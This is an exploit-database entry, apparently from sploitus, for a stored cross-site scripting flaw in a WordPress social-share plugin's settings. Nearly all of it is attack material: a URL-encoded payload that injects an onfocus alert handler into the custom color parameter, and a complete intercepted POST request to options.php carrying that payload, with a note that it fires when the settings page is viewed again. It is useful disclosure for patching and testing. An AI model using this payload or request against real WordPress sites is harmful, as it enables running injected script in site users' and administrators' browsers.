## https://sploitus.com/exploit?id=WPEX-ID:9DEC8AC7-BEFD-4C9D-9A9E-7DA9E395DBF2
Intercept the request made when saving the settings and put the following payload in the meks_ess_settings[color][custom_color] parameter: %23ffd635%22autofocus%20onfocus%3d%22alert(%2fXSS%2f)%22%2f%2f
POST /wp-admin/options.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 634
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1
option_page=meks-ess-settings&action=update&_wpnonce=5d8e1580fd&meks_ess_settings%5Bplatforms%5D%5B%5D=facebook&meks_ess_settings%5Bplatforms%5D%5B%5D=twitter&meks_ess_settings%5Bstyle%5D=1&meks_ess_settings%5Bvariant%5D=1&meks_ess_settings%5Bcolor%5D%5Btype%5D=brand&meks_ess_settings%5Bcolor%5D%5Bcustom_color%5D=%23ffd635%22autofocus%20onfocus%3d%22alert(%2fXSS%2f)%22%2f%2f&&meks_ess_settings%5Blocation%5D=above&meks_ess_settings%5Bpost_type%5D%5B%5D=post&meks_ess_settings%5Blabel_share%5D%5Btext%5D=Share+this&meks_ess_settings%5Blabel_share%5D%5Bactive%5D=0&meks_ess_settings%5Blabel_share%5D%5Bactive%5D=1&submit=Save+Changes
The XSS will be triggered when viewing the settings again